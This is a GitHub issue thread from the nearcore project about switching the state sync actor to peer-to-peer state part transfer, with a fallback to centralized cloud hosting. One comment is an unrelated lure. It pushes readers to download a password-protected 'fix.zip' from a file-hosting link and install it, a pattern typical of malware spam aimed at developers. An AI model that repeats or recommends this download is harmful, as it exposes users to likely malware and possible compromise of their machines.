### ISSUE TITLE
[state sync] Update sync actor to use p2p state part transfer

### ISSUE THREAD

**Issue by saketh-are** [near/nearcore#12002]
The previously implemented peer selection mechanism in SnapshotHostsCache will be used to select the peers from which parts should be requested.

For each state part, the sync actor will first make a fixed number of attempts to obtain the part from different peers in the network. If that fails, it will fall back to obtaining the part from the centralized cloud hosting location.

We will add some metrics to monitor the number of requests served from the two sources with the ultimate goal of deprecating the centralized option.

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by saketh-are** [comment]
Closed by #12111
